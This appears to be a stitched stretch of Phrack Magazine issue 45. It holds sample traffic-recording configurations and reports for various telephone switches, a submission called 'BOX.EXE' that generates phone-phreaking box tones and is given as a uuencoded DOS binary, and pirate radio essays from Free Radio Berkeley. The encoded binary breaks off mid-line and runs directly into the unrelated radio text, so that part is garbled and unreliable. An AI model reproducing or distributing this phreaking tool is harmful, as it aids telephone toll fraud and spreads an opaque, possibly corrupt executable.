/OPM007/ 000 078 007 65535 65535 008 000 /OPM008/ 000 078 008 65535 65535 009 000 /OPM009/ 000 078 009 65535 65535 010 000 /OPM010/ 000 078 010 65535 65535 011 000 /OPM011/ 000 078 011 65535 65535 012 000 /OPM012/ 000 078 012 65535 65535 013 000 /OPM013/ 000 078 013 65535 65535 Example of TRAFFIC report ~~~~~~~~~~~~~~~~~~~~~~~~ OPM001 TRAF HLST MON 08/19/86 15:00:00 HRHR PEG BLK USE ORTM 00635 00000 00978 OROG 00477 00000 00685 ORNC 00089 RVRT 00012 INTM 00429 00000 00707 INOG 00000 00000 00000 INNC 00003 OPM002 OSVC HLST MON 11/02/85 15:00:00 HRHR PEG PSIG 00027 PDTO 00015 PABN 00092 FSTR 00168 DGTC 00599 DPC 00874 TOTC 01473 % DGTS 000.0 DPS 000.0 TOTS 000.0 ************************************************************************ ----------------- Northern Telecom DMS-100 Switch ---------------------- ************************************************************************ Example of RMT data ~~~~~~~~~~~~~~~~~~ ACTION IN LINE 004 VARIABLE LOWER: 00000 UPPER: 01015 ENTRY REQUIRED STRING NEW ACTION TYPE STARTING ENDING PHASE PHASE REGISTER REGISTER --------------------------------------------------------------------------- 001 000 /QWMPR2/ 001 075 255 65535 65535 002 001 /SLOWS/ 002 077 001 00020 00999 003 002 /TRMT2/ 003 068 066 65535 65535 004 002 /ANN^J/ 002 068 119 65535 65535 005 002 /SITE^J/ 003 073 255 65535 65535 006 003 /TRK^J/ 004 077 002 01000 04499 007 004 /KEY/ 005 081 019 00027 65535 008 005 /QFZ^J/ 000 077 003 04500 04920 Example of TRAFFIC report ~~~~~~~~~~~~~~~~~~~~~~~~ CMFLINT OMPR213 AUG13 15:01:09 3684 INFO CM REPORT CLASS: NMCTRAFF START: 1986/08/13 14:00:00 WED; STOP: 1986/08/13 15:00:00 WED; SLOWSAMPLES: 36; FASTSAMPLES: 360; CPU MTCHINT TRAPINT CPUFLT SYSWINIT SYSCINIT SYNCLOSS MSYLOSSU SSYLOSSU 0 0 0 0 0 0 0 0 0 ICO IOCERR IOCLKERR IOCFLT IOCLKSBU IOLKMBU IOCSBU IOCMBU 0 0 0 0 0 0 0 0 CMC KEY (CMC_INDEX) . . . *********************************************************************** ----------------- Northern Telecom DMS-250 ---------------------------- *********************************************************************** Example of RMT data ~~~~~~~~~~~~~~~~~~ ACTION IN LINE 003 VARIABLE LOWER: 00000 UPPER: 02387 ENTRY REQUIRED STRING NEW ACTION TYPE STARTING ENDING PHASE PHASE REGISTER REGISTER -------------------------------------------------------------------------- 001 000 /QMPR2/ 001 072 255 65535 65535 002 001 /INFO/ 002 073 255 65535 65535 003 002 /SLOWS/ 000 078 001 65535 65535 Example of TRAFFIC data ~~~~~~~~~~~~~~~~~~~~~~ QMPR18 AUG28 17:00:43 4000 INFO QM REPORT CLASS:SCHOURDC START:1984/08/28 16:00:00 TUE; STOP: 1984/08/28 17:00:00 TUE; SLOWSAMPLES: 36; FASTSAMPLES TRMT1 VACT UNCA HNPI UNDN BLDN UNIN TESS 0 60 0 0 0 0 0 0 0 0 TRMT2 DNTR CNOT DCFC PRSC GNCT ATBS MHLD 0 0 0 0 0 0 0 0 0 QMPR220 AUG28 17:30:16 6100 INFO REPORT CLASS: ADHOURC START:1984/08/28 17:00:00 TUE; STOP 1984/08/28 18:00:00 TUE; SLOWSAMPLES: 36; FASTSAMPLES: 360; TRK KEY (COMMON_LANGUAGE_NAME) INFO (QM2TRKINFO) INCATOT PRERTEAB INFAIL NATMPT MOVFLATB GLARE QUTFAIL DEFLCDA DREU PREU TRU SBU ANSWER INVAUTH CONNECT TANDEM AQF ANF ********************************************************************* ---------------- Northern Telecom SL-1 Switch ---------------------- ********************************************************************* Example of RMT data ~~~~~~~~~~~~~~~~~~ ACTION IN LINE 005 (RAM) VARIABLE LOWER: 00000 UPPER: 00010 ENTRY REQUIRED STRING NEW ACTION TYPE STARTING ENDING PHASE PHASE REGISTER REGISTER ------------------------------------------------------------------------- 001 000 /TFS000/ 001 073 255 65535 65535 002 001 /19/ 002 073 255 65535 65535 003 002 / / 000 084 255 65535 65535 004 001 /TF/ 000 073 255 65535 65535 005 002 /TF/ 000 073 255 65535 65535 006 000 /TFS001/ 000 078 001 65535 65535 007 000 /TFS002/ 000 078 002 65535 65535 008 000 /TFS411/ 000 078 141 65535 65535 009 000 /TFS412/ 000 078 142 65535 65535 010 000 /TFS999/ 000 073 255 65535 65535 Example of TRAFFIC report ~~~~~~~~~~~~~~~~~~~~~~~~ 001 TFS000 13 10 1978 10 30 00 001 TFS102 00 0000157 00100 001 TFS102 01 0000194 00100 001 TFS102 02 0000194 00100 . . . 001 TFS001 00 TERM 00000 0000012 00023 00000 0000157 00161 01 TERM 00000 0000028 00018 00000 0000256 00157 02 TERM 00000 0000015 00019 00000 0000194 00134 06 CONF 00000 0000000 00000 00000 0000001 00003 07 TDS 00000 0000000 00000 00000 0000000 00000 . . . ************************************************************************ ---------------- Northern Telecom SP-1 PABX Switch --------------------- ************************************************************************ Example of RMT data ~~~~~~~~~~~~~~~~~~ ACTION IN LINE 013 VARIABLE LOWER: 00000 UPPER: 00042 ENTRY REQUIRED STRING NEW ACTION TYPE STARTING ENDING PHASE PHASE REGISTER REGISTER -------------------------------------------------------------------------- 001 001 /JAN/ 002 073 255 65535 65535 002 001 /FEB/ 002 073 255 65535 65536 003 001 /MAR/ 002 073 255 65535 65535 004 001 /APR/ 002 073 255 65535 65535 005 001 /MAY/ 002 073 255 65535 65535 006 001 /JUN/ 002 073 255 65535 65535 007 001 /JUL/ 002 073 255 65535 65535 008 001 /AUG/ 002 073 255 65535 65535 009 001 /SEP/ 002 073 255 65535 65535 010 001 /OCT/ 002 073 255 65535 65535 011 001 /NOV/ 002 073 255 65535 65535 012 001 /DEC/ 002 073 255 65535 65535 013 002 /19/ 000 075 054 65535 65535 . . . Example of TRAFFIC report ~~~~~~~~~~~~~~~~~~~~~~~~ 0067 OPR MEA 00315 013077 18 - 200SUS LIN# 0 78 2 2 8 0 0 32 0 36 0 2 82 LIN# 1 8 0 0 8 0 0 32 0 0 32 2 0 WED 11 SEPT 1980 112777 572 415 23 3 46 160 1992 0 0 516 0 0 22 1 2180 0 0055 OPR MEA 045331 112044 2420 1713 101 10 327 628 4512 8512 0 WED 11 SEPT 1980 1:06:27 1606CLS3 . . . *********************************************************************** --------------- Stromberg Carlson DCO Switch (!!) --------------------- *********************************************************************** Example of RMT data ~~~~~~~~~~~~~~~~~~ ACTION IN LINE 006 VARIABLE LOWER: 00000 UPPER: 00837 ENTRY REQUIRED STRING NEW ACTION TYPE STARTING ENDING PHASE PHASE REGISTER REGISTER -------------------------------------------------------------------------- 001 000 /COMPLETION/ 000 084 255 65535 65535 002 000 /ROW/ 001 077 001 00100 02039 003 001 /END OF TMR/ 000 073 255 65535 65535 004 001 /***/ 002 073 255 65535 65535 005 002 /^M/ 001 066 001 65535 65535 Example of a TRAFFIC report ~~~~~~~~~~~~~~~~~~~~~~~~~~ SITE:ACD,INC. GROUP: 1 BUFFER:ACTIVE COLLECTION TIME: 08:00:00 05/01/79 COMPLETION TIME: 08:01:05 05/01/79 ROW ODD3S ODTNP 0 1 2 1 OLOSZ OLMAT ORVEC 2 3 2 1 OLOTB OLOTL OLOTP OLMDS OLMBY 3 7 2 1 8 3 4 5 ... . . . . *********************************************************************** -------------- TRW Vidar ITS 4/5 and ITS 5 Switches ------------------- *********************************************************************** Example of RMT data ~~~~~~~~~~~~~~~~~~ ACTION IN LINE 006 VARIABLE LOWER: 00000 UPPER: 00837 ENTRY REQUIRED STRING NEW ACTION TYPE STARTING ENDING PHASE PHASE REGISTER REGISTER --------------------------------------------------------------------------- 001 000 /ITD REPORT/ 000 073 255 65535 65535 002 000 / TO / 000 072 001 65535 65535 003 000 /SYSTEM/ 000 078 002 65535 65535 004 000 /GRADE/ 000 078 004 65535 65535 005 000 /SEPAR/ 000 073 004 65535 65535 006 000 /END/ 000 004 255 65535 65535 Example of TRAFFIC report ~~~~~~~~~~~~~~~~~~~~~~~~ TIMED ITS REPORT ADAM FROM 08-18-86 13:01:31 TO 08-18-86 14:00:28 CLEARING COUNTERS GROUP TOTALS NAME TYPE ATT COM XCS AVH OFL LSSO ORIG 131 93 1671 13 0 LSSO TERM 129 98 1729 13 0 LSS1 ORIG 159 111 3093 19 0 LSS1 TERM 114 97 2793 25 0 LSS2 ORIG . . . . ********************************************************************* ------------- Western Electric ESS 5 Switch ------------------------- ********************************************************************* Example of RMT data ~~~~~~~~~~~~~~~~~~ ACTION IN LINE 003 VARIABLE LOWER: 00000 UPPPER: 00100 ENTRY REQUIRED STRING NEW ACTION TYPE STARTING ENDING PHASE PHASE REGISTER REGISTER ---------------------------------------------------------------------------- 001 000 /S570/ 001 075 255 65535 65535 002 001 /TION 1:/ 002 078 001 65535 65535 003 002 /TION 3:/ 003 078 002 65535 65535 Example of TRAFFIC report ~~~~~~~~~~~~~~~~~~~~~~~~ S570-108396613 86-05-13 12:01:22 12430 OP TRFC30 VLD TIME: 12:0:27 SECTION 1: VALIDITY PROC DATLOS SCN10 SCN100 0 VALID 0 18 7 VALID 180 18 10 VALID 180 19 9 VALID 180 18 2 VALID 180 18 6 VALID 180 18 4 VALID 180 18 3 VALID 180 18 8 VALID 180 18 5 VALID 180 18 1 VALID 180 18 11 VALID 180 18 S570-108396613 86-05-13 12:01:24 12431 OP TRFC30 OFC TIME 12:0:27 SECTION 3: OFFICE TOTALS DPORQ = 46 TTPRQ = 693 DPINRQ = 1226 MFINRQ= 9577 CDIRR = 58 TCBUSY = 11 . . . . . ---------------------------------------------------------------------------- ==Phrack Magazine== Volume Five, Issue Forty-Five, File 22 of 28 **************************************************************************** BOX.EXE - Submitted to Phrack Magazine for your amusement. by The Fixer / 604 This is a tiny, minimalist demonstration of several types of box tones. No cosmetic bullshit, no command line parameters and no config files. You just type BOX. The only requirements for this program are an IBM PC or compatible and an Adlib Music Card or one of its many successors (including all Sound Blaster types). You may need to turn the volume up a bit as the pure sinewaves tend to be quieter than other Adlib waveforms. There are keystroke menus in the program. If you need more help than that, you shouldn't be running it. -=( The Fixer of 604 )=- begin 644 box.exe M35J'`1$````"`"L'*Z>@`X`````2`-D!'````$Q:,#G__U6)Y3'`FLT"D`*# M?@0`=7_X!YJE#B"!S M:?__;75L871OSWF\KB0O@4+@/;\!?X*%O5^`O^Y/@) M!.2-O@`?4O\65[C_`.(UXIV'_^+^BH;G,.2)AOS^N`'QPP`[^7X#Z94!\/[' M8?[K!/_ZB[[\BH.`X=S(^PK2/#$/'W42_S8$\38"`+AD_BFSZ,3[Z5$!/#+J M"#:$Z@;J_*[J.^H4&S/J#.H*ZOR80HKJ)>HTZA`-(>H.ZOR"Z@_J-<6&ZA3J M$NK\;.JGV/D`/#;J&.H6ZOP04E;JX^HWZAQL".H:ZOQ`ZLTI-NHXZB#J'NK\ M*H04ZK?J.>HD&T+J(NK\%.JAZC"*?>HHZB;J_/[ZZ8LXQ.I+=1'N-.H0?S+J MR.KH^NMV/%.*#>L\ZSK5_-.GV.MA/%3K,.LNZ_QPBK[K3#Q0ZS@-I^LVZ_RI MZS<\1.O8<"SK*NO\E.LB/"&*8>M`ZS[KT`<(_^M_ZPT\+'4)N(0NU0/W[+A+ M6/'WBW[Q:_+OW70#Z7'^#/`.Z$'\Z='#'/O=MAHBZ-$BY]`/"^C2[=$2V4'4 MH/3LT1'9-ME"].C1AH8-V3+90_0J4=LC_2V01"&`V"`E@=NJ[&3=<=/_@=@0 M%R/8"Y#8*;P%%.@H;KO9U?@9O^7D^!KQY/@:_8'X*0D&[;6Y^!DKY/@:4>3X M%%W#'<3P"2#($AV_,J7R(%1O;F5SJ_;4_.U4X>(M__[B_N___R(@X>51+O]1 M=6%R>-K_>/A#[T-O:<%C;VQL'X-E8W0A($3N1(Q4^#+T_U+=_IET=7)NXV\> M($[O3FEC:V5LWOU"[&#O4C/98F'KRN@@(76[RN@4.\@+SN@V@@=-\"B@U?@9 MO[[M=N3X&MSD^!K_Y/@:(0AE^"A`U?@9OV&[_N3X&H/D^!1=PZ#+E;8$Z!CX MFO_Q"`,N`@C`=/>:&O>(1GK#_J:Q+M4`=2/K_?WK_7_>4.A7]CS_=`WU3/:" ML=\WZ7@!Z7(!!]`0R_7I7`?0$;4T-.I&!]`1G^HP!]`1B30$ZAH'T!%SZ@3J M0T,'T`]=ZNX'T!%'ZMA#0P?0$3'JP@?0$1OJK$/1!]`1!>J6!]+J!]`*!]_O M].F`Z@;0#]GTZVL&T!#0T,3K5@;0$*_K00;0$'##FNLL/"`&T`Z%ZQ>_WSQ2 M=07H[/<$J1MT!#Q1`*I?W?\`ZP/I2EOQ!ZHR\`^Z^C+P*MTWB?0R]W[T,O*$ M`>E^,O5(AOAX1GAN8_WSZ<:&:#+U3.I*ZOSGZL:&4C+U4.I.ZOS1ZL:&/#+U M5.I2ZOR[ZL:&)C+U6.I6ZOREZL:&$#+U7.I:ZOR/ZL:&^C+U8.I>ZOQYZL:& MY#+U9.IBZOQCZL:&SC+U:.IFZOQ-ZL:&N#+U;.IJZOPWZI!BHNHJZG3J.MVZ_SV\J?8ZV(\0NM\ZWKK_'"* MX>M-/$/K@`V-ZW[K_,SK.!WTA`T-ZX+K_+?K(QWP$**V[^LF\`\^)O`+!B;V M!N@2^R;P*J_NQ_(F]Z3R)O(N`>DH`9J/`3K'1OH!F?_Y8HA[1'="=R&3OV(9 M\OFINX-^^@1UWQ\+XO@,^_'IZ@`N*NK_,+']ZN7Q^MY!.G3^`UTT_@+%&IM MY=-ET-/X"Y7ETR_3'WCP$'#[&NL*/!M\]Y1\]C54:/\5:7,@ M<')O9W)A;1')B\G@W_OO86X@061L:6+!] M^+__7<,`%U+Z0@:Y,"XY.2!B>?\;(%1H92!&:7AEA^_>@9^*+7 M`*#]H@#6UOK]X-E527.Z^!1:_YRZ^!3D_,GD^!1=[>LI/`%U"./CZ*WWE.L= M/`+T;W2<^?01/`/T/?L.'O0%Q@;ZVKG_O_L/KK2_V`"JEHO?!W.Y]1^W_0#_ M^`LNR`VAA`2)1OZAAO__^ORZB`.*1@CNBT[^[.+]<(A"]0;N2O3\!NOT5>'* MSSX"L&(W4-$:`U;[&34).!@;P*JR]SX#9)E>](]T_]7".D.Z)$`@7[^ M_P!UZ]+^-O@)#W$3:0"P!-E@V>'^BL/V@/;7_OR$.N;_#]'9X;#_[\;E^#0A M]KS^N`JL)O_$]OQAW?S"_J/"_YG^0WB`?OV2!OK\P'0$J"Y^ZVIA2OQ,^`T` M`G=]W+_WBE8&N_$PY(OXB)4'K+U%;SQ:" MS_@2=\_X"0S/_9+/AE#P#UL%P``A/`@&];EET^`E,*(P\$`">4"*A;R"$23/ MBM#Q_0+\IKD6XO@*"B;.)O@4H/@D`J#X#6WMRZ#X"P*@_)W&\!E'RB#I4O]( MD``$PM$_11K1$?@1?*K;`>O8:2!I_#/X#`P@PP+#^#=8QQ##Q:CCP_@Q)._# MZFV(P_@6M>O#^`T&)`]:\`[P6O`A*&VUTM@*H/@70%+P"092\D+RF/@,/Q5L MF/@AP']RF/@FL*#X#L"@^"%@VZZ@^")@BN@.\#CX#P^8^"'X^YCX*6U=R_@6X=`-T>`E M-FL.(O`/X8+P(5*CA-`?H_@1`JW?H_@-A]`5)*/X"=B]L+U0H-E^]-7&V/C6 MP^?X#3?:O^?X$_?GQL:FY_@3^^>-Y_@3_>=:*W3G^!.L\EOG_"_H&.!S];7W MN+#ZM?`@!_BU\!/H`/]#8ZG#@/G\0*>Y"OP?C!7\9OQ)@<`-SZDVUNS$`XS# M[.8!9\`)4\(Q2TW_YA+FS/]#S7W1YWON^9LBV?J-U,+BW/@3[]QV/-SX(B4J MN/G<^!F4W)3<^!+$M>8$YE/]//_F^`Z6QE+F^!*H^`L/W&1@^![<0*E6W/@: MN`>2XKCX'@62RMSX"6UMDO`).<'XE?/OH?@7X[(EN?`B`6UL6?@>[?*EN/@> M`]R!-?@BS9(*3)3X&MRIW/@=1N33"5S\QVYK9*Y'4_.7\)?\#@>((>IIDF?"4 MJ`JB^`G_=@8H\RAEKID:\G_@P_^=C-W1YXN%)0..CL*/D8I6W@.E6@2^&Z7= M_XF52`1T\[D*-L$#4"#5?^.:L_D[2';<>K'J%@#)[?X+Q\ED!!J0$]\*!*!P M[_>+7@B(7M^,_^ZY!0`8E/SN$Q5*N1[TV;`@F3\`V8;[`EX&U.W9#VOVT`K^ M^M8Z1OUT&LCJXLSMXOW8T7;2853C\7H&X]`.`_`-/]@(;'OV]1WBQ?7X"8*+ MZA%UUGV`(/4PU<<&A`2N^G\\A@0D`,8&W`'[W0$!#`_[W@&G!M\!`X<]^^`! M!/OA`;6!X@$('`[[XP$)^^0!"H?#^^4!"_OF`0S[Y^%P`0W[Z`$0^^D!$3@< M^^H!$OOK`1,.A_OL`13[[0$5^Y12[KKOIO"U\3JDH?(!!OOSG'1(]+#U`0?[ M]BFEJ_>7^*;YDI32^J;[G/RA_2%]`0[[_IS_`0^_'.OJ,.H`/W0PZQP#[_@. M_>`Q^LO:X/_QGV^!OO__CL8F@#X.5T<`^W0:\_@)'EGS^`G^=2W`V]0C@P0` M_8'PUU$P#"+XAO#\-?D=`^O8"UD$_OF@_0[PIYKVS/<)=>U=/UW+-?/_`'A[ MBU/H*`"_G,*\:9$(4>W'Q<^T-[6AV_O_$M`_HU`4\!W0*/`-V!KB' M'P,`Z%7]GP"T"#+__O]_!8K$)'^BF`2BC@0SP*(0_HGXF?V:!$"BB`3#_XX& MR)YL`":*'28Z'73X__OXN.3_F>@\`O?0]](__+DW`/?QHY2)#A^Z.`$_P;@; M)!_^SG@;_LDZ#OPA<7<3_LTZ M+I?X"V#X=7$.<>A!`\H!P@@`$UP^MHL01P[KBUSH-OF`[_4*`\OH&@/C_LKT MAXKE&P3+N`$'Z^J=X@$&'3D"6.6*R(KT#^[&.NYU`C+`Z/:,0\=M=7<$?0(\ M#K-R%SK@=Q&'!W,"-I'R"3HVD_+8/RS"`F39Z+4"BL(J!@PAV_[`CZGTQ@`2 M]-WTO/P/%*CP=`0D#PR`@"87?I9P"`8/_^8D![$$TN`J/>B/Z/WT]\N`#BQ] M^@C+XO2[BT\$XQ/W?_/J,__*Z:&4!#/2Z`4`XO;\=\\M`0"#V@!R!:WJ\\/Z M_]1?!+C=-+H2`#O3L*P'42,N3I#_?X"H@F[PKD=7_I MZ!/XA_YL'C;%?P3'1?#PX=?[!(``C87\B46'_PR,70[Q$&<#C$T2QD7K_S`` M'^3QU?VXGP.[?02+RX$?'WT"L==T"L:RU[A,0GCOV,H4TA:)71AX./H:B4T< M^AXSP/T_R%6+[,1^!B:+501*2L#/^F`FQ'T,,]L?_F@.Z%S_N0@\"'0T/!._ M_W0P/`1T1$FR,2<\`70C/`;__W0W/!IT1CP-=$\\('+/.]K__W3+)H@!0^B8 M`#O>=L"+\^O_'[P+VW2XL`CHAP"P(.B"X`_[]GT`2^+JZZ0?_^!TH":*`@<`$?B]^L_(`/HG`#HUOS&SS^\^[`- MZ`+["E-14C?&=>ER`%@;X2HK+43_IS,\"G0UM`F*'HX$,A2_]U+H8P%:_L)] MZG8@BG'IZQ<_P+0.Z$\!ZQ/M\W0'@@W^RNO3Z9OPWPB;+0`'6EE;P_[&6^H' M#788_LZ>$>G>X`P4#Q^Q6<.T`Z/I"@&T`H?A^0,!E![(-A90C1@`'\RY]TAP M(1/N<"QT;#E'?_T\87[H;IRA_Y`LZ&(`#,.B!W/"`*[KYW@?_K!^@^`--'@,^JIN*FZ#``\7^5B96*QO8F2@`R]@/"_S!6N19C`+`. M[NOKQ4*>POI*L`_TP?0?#W_#._=T8YI7'@:+SRO.GO_#BL?'_P/#T>"+],/X MQ8/"!H`^208?/YRAS@!U`Z',W1Z+!/[_#`8?CL#\"MMT%JR*V.RHQ_\!=?OZ M^G3[B\.K^^+L?^CK!HKGK*OB_,E?[_%6__=750;-$`==7U[#`+H:V=J,__\& MO``S[>@`"^B@`(O$!1,`'_ZQ!-/HC-)1HXX`HY``0P@#!HCYDOV<\'C]X*.H M`([1)J$"Z-_UI"C!K@#6`(P.L*K)#_\&OCD"N<20_"ZLM#7-_ULAB1V,10*# MQP3B[Q+2#%71A_02T;H3^"/XVP"X%-HD^`3P/_K*N'3)\#I0_KAC`@Z*4FZ1 MR`(T_NP%[/@*.NRY`LLSP/__G%N`YP]3G9Q9@.7P@/WP=.]?#D"`S_#P_70! M0*+0`,.'Z?C_8?N#Q`98@^6`/_#@/PYNC\6`,0>L@",P+$3ELF&AO6CM/W`OQ$! M(`N%!E/+_?,<*@C\]_HZ(6G!K/`+)1[%%=;QK?+PH0P?L`L&L'0INTP"A@_. M`*%:Z#(`NUL!OO0>].GH0`"P.CB$4<':Z#7I8.DT/`?=M$S!+HH'"OR/0P;H M.`!#Z_/#L63['^:Q"E_AZP0RY/;Q!#!0/PR^6(K$PU#\Z`$]#/901='HZ`/W M)`__P^0\.G("!`>*T+0&N,/__P`"&R$C)#0U-C7)I9VC_'^@H8RD@,3DX M,RPY,B!"_C_A;&%N9#/`AP;``,N#/CC\^YW!RZ'YZ7#^B_3_AS:.1`(F.U4" M?P=\%/CC`05R#_,&?`CQ#L/X101WV+C)V$C#X?ZXU_I"_@5K<@W_8RO$D#>^E?"M<'J<'=\C'%50PXH^[0^`HSR2:'ZLGC8[^=0HF@W\:`'0#VW[H M<``_\JQ2R0SZN1$[\W7S#,/;P_AT">L*P\%T`4Z/P[C0[\#]_\T"`+[4`(S: MZ%C_O?@)+5K(O=_\[/P*._SE$O#FY6XF_U\4XNW#\O(/&/+^R0RX6`:+3K^' M_7X(BU8*1]`09L,4#ZS0^\'A M]]F&__OWZ?BDPA#+B_"+^O\!]^%04HO&]^.+V'_^I?2+R%I8`],#T0^QPSX\ M)\/X$71>9IF_^6:+RF/XO/O+MU4S[0O_^])Y"$7WV(/2`/?:P[$^>0MP@$7Q MV8/3\?/P83-)\8O[,]O,B]#XASN]$`#1X-'2T?___]-`*\X;WW,%2`/.$]]- M=>GW?UWK%EVZR>FW^>/WDY+W\9/`\/W-T\?1[7.&%@BS_478!YG]75K]AP]C MXA"F9M/JB\+A__7J<8/A'W0&T>K1V.(6\?K=^`_BW?@,>=W\B_N_W(S:(=ZL MJHK(,NWSI([:0NPZ\>;\Z@KB!IZBK-]".L%V`HK!W/@)"MS]X`Q<_-@(BOC) MV`8+R7_^"0-NL0/Q*\%R$T#&/KSN?0(SR3O!!HO!Z^?R7.&JB\B_"+__@2;A MX8H-IJPF``4/)L;A@P7_E?;0`_E'D7Z_;_T`\1[%=@K\LM(LBM`R]O3_0MK- M*\IR'$%'K/*N=17_.XO'B]F+RDGSIG0."[G+BQS^T4;KYH_K!$@K1@9%81]= MCO]1P]J3BB4P(]'A##_Z+Y4D,H?@*`'Y<<(#Z M8WY6@?K-(21_3_D&^7Z-,"WYC?@0"(U8_I;X"M98[`,Q29+\/I)[DORS_N_\ M"9%=RFN;,\F)#;C]&``]W6C!KN&: MAV#IC97HN?V)S'.$C\FJ.]AT((#_7^P:=`-#Z_*+TRO0N?__NOU2_[&VRDC) M'>@-_#OWF_U@`>![GH!BO/`?[1Z8#9J\,``+P"80"$`_Q,!/K\&`#X%`7X_``B M]OSTW/0``/ST_/+``/SPI`;P``#\\/SP`(7\[OPHU\'Z'X:8"+D"N03\.`7\ M!P#%!0(#]/ST@`C\]%3T`!#\]/STK8%H^/SXU&$&``#@_.C\&%SP5@:Z__@/ M___L^!&'!O_X&A!`_*#-N;CY4`$:;;'__P#P`````````````````$\1```` M0+$#V0&)`=<#B%,```8.'XL.#`"+\4Z)]XS;`QX*`([#M``Q[?VL`<6JXOJ+ M%@X`BL(IQ8K&*<4YU70,NI$!M`G-(;C_3,TA4[A3`%#++HLN"`",VHGH/0`0 M=@.X`!`IQ2G"*<..VH[#L0/3X(G!T>!(2(OPB_CSI0GM==C\CL*.VS'V,?^Z M$`"MB<71[4IU!:V)Q;(0,3 MB\(!V([`K8OX@___=!$F`1WB\X'Z`/!T%H'"`!#KW(S`0([`@^\0)@$=2([` MZ^*+PXL^!`"+-@8``<8!!@(`+1``CMB.P#';^H[6B^?[+O\O0U)#($5R0.%`X\#E`.F`ZL#L`.Z`[\#T0/6`]L#[P/T`_D#)P2.!9<%K@6S!7$& M>P:`!I(&EP:`F*"8\)E`FF":L)L`G""<<)S`G9">0)[0GY M"0(*IPNR"[L+QPO0"X$-C`V5#:$-J@WN#2(.9@Z3#L`..@\_#TT/4@]D#VD/ M;@]U#WH/?P^+#YL1\!'U$0<2 M#!(1$A@261)A$GD2LA+J$BH33A-\$P(4,11@%-H4.A6:%From Zeke Teflon's book - Complete Manual of Pirate Radio Freedom of communication is a basic human right. Like all rights, freedom of communication consists of being able to exercise your abilities with- out interference. Government cannot give you your abilities, but it sure as hell can (and will) interfere with you when you exercise them. Government cannot give you rights. It can only take them from you. If all governments (goons with guns forcing others to follow their dictates through violence and coercion) were to cease to exist, human rights would certainly not cease along with them. The naive objection could be raised that while governments cannot give you rights, they can protect them by preventing your fellow citizens from interfering with you. That's the theory. In practice, governments rarely 'protect' citizens' rights, and then only when it suits their political purposes. Invariably, when governments feel the least bit threatened, they place their own 'security' needs above the human rights they supposedly safeguard. Through- out history the vilest and most consistent violators of human rights have been governments. Governments, along with their bedfellows, organized religions, have been responsible for the overwhelming bulk of human rights violations in every human civilization. We cannot look to government to protect our rights. We have to do it ourselves, and an effective means of doing that is by exercising our rights. Use 'em or lose 'em. --------------------------------------------------------------------------- ***** Connecting to the Net ***** One of the best tools for the immediate transfer of news, information and discussion is the Internet. With any basic computer and a modem, world wide access is just a few keystrokes away. In the Bay Area one of the best Interest access providers is CRL, for a flat rate of $18 per month you will have all the Interent resources available to you. Resources include the ability to send email to anyone else in the world who is on the net as well, check out hundreds of news groups for the latest and weirdest happenings, send breaking news and information to other community broadcasters, etc. At the moment we are working on a way to digitally record and compress 5 to 15 minute audio spots into a computer file which can be sent anywhere in the world where there is a computer to receive it. With an inexpensive digital recording and playback card which plugs into any basic PC system, micro power broadcasters will be able to send and receive these spots to and from anywhere in the world. This completely bypasses the rather expensive satellite feeds and makes for a much more decentralized system of distribution. If you are interested in this project please contact us. To reach CRL in regards to an Internet account give them a call (415) 381- 2800. -------------------------------------------------------------------------- ***** MICRO POWER BROADCASTING, TECHNOLOGY FOR THE PEOPLE ***** With circuit board dimensions of 2" x 4 1/2", a five watt FM micro power transmitter is capable of covering a community 3-5 miles in radius. Such compact and inexpensive technology has the possibility of giving each and every community its own voice. Stephen Dunifer with Free Radio Berkeley has been designing and developing this unit along with a series of other transmitters, amplifiers and antennas over the last year. Mass produced RF transistors and communications IC's have made it possible to design and build stable and clean transmitters and amplifiers for a fraction of the cost of brand name type accepted equipment. Even the entry level 5 watt kit, using only three transistors, is very stable once tuned and set up. Even more sophisticated phase lock loop (PLL) frequency control designs are not that much more expensive to design and produce. At this moment, several individuals are working on low cost PLL designs which should meet current FCC requirements for frequency stability. When these designs are finished they will be available in kit form and assembled as well (for shipment outside US only). What does it take to put a micro power broadcasting operation on the air ? First off, less than $500. A basic 5 watt FM transmitter, output filter (very necessary to reduce output harmonics), coax cable (50-100 ft RG8), antenna and power supply (battery or 12 volt regulated and filtered unit) is going to cost about $125-150. This is assuming assembly of kit and antenna. Next, a VHF power meter ($30-$40 at Radio Shack), a dummy load (make from resistors or $19 at Radio Shack) and a frequency counter ($50-150) are needed for tuning and keeping things optimized. Beyond those requirements one sort of audio source (line level -10 dbm, .3 volts) or another is needed to feed the transmitter. This source can be a walkman type cassette unit, a mixing board, tape deck, etc. Granted this is not a professional studio but for low budget community operations, it does not take top end gear. Creativity and determination as shown by many community stations can certainly make up the difference. Once all the equipment has been assembled and arranged, a suitable place needs to be found for the operation and setting up the antenna. With FM, which is line of sight transmission, the higher the antenna the better. Depending on the regulations and political climate of the country in which you live, your operation may need to be portable for rapid set-up and break down. That seems especially true here in the United Corporate Snakes of America. At the core of this is the potential to set up loosely coupled autonomous networks of communication around entire planet, outside the grasp of corporate/government control. This is the goal of the Free Communications Coalition, the umbrella organization which is being formed to support, defend and encourage micro power broadcasting. Micro power technology makes this possible through a combination of low power. inexpensive FM, AM, TV and shortwave transmitters. Free Radio Berkeley, San Francisco Liberation Radio and other interested parties will be placing an international shortwave station on the air (100-300 watts initially at 40 meters - 7.4 to 7.5 Mhz range, increasing to 1000) sometime in November, 1993. If we had to use tube designs, doing such an operation would be impossible due to the portability requirements. Instead, relatively inexpensive transistor designs allow to us build linear shortwave amplifiers capable of output powers exceeding 1000 watts while running off a bank of lead acid batteries. Certainly, within the normal definitions, 100 to 1000 watts on shortwave is definitely beyond the usual micropower definition. However, when right wing evangelical ranters are running 100-500 KW it could be considered to be micropower. At the moment, Free Radio Berkeley is offering an entire line of transmitter and amplifier kits for FM broadcasting along with antenna and equipment designs. Assembled units are available for sale outside the US only. A rather effective antenna can be built using common hardware store parts for about $10. Our work will be expanding to include UHF & VHF TV, AM and shortwave designs. We would like to find other engineers and technically inclined people to help increase these efforts since we are a rather small design and development operation. Further, we need such technically inclined people to act as advisors and facilitators in the process of helping people build, test, tune, and setup their transmitters and antennas. That way, we can create a pool of people across the country and world who will be available to lend a technical hand to those who wish put micropower broadcasting operations on the air. Let a thousand transmitters bloom Stephen Dunifer Free Radio Berkeley / Free Communications Coalition - the People's FCC --------------------------------------------------------------------------- Freedom of Broadcasting in Italy Just for you to know, back in 1974/75 Radio Milano International in Milano (not associated with us) started as the first private-pirate FM station in this country, operating from a van which kept moving around the town to avoid the PTT authorities (equivalent of the FCC). RMI brought the first regular stereo programs to Italy, good music not heard before on state channels, as the other stations which came after them did. They also went to court and fought for "free", private 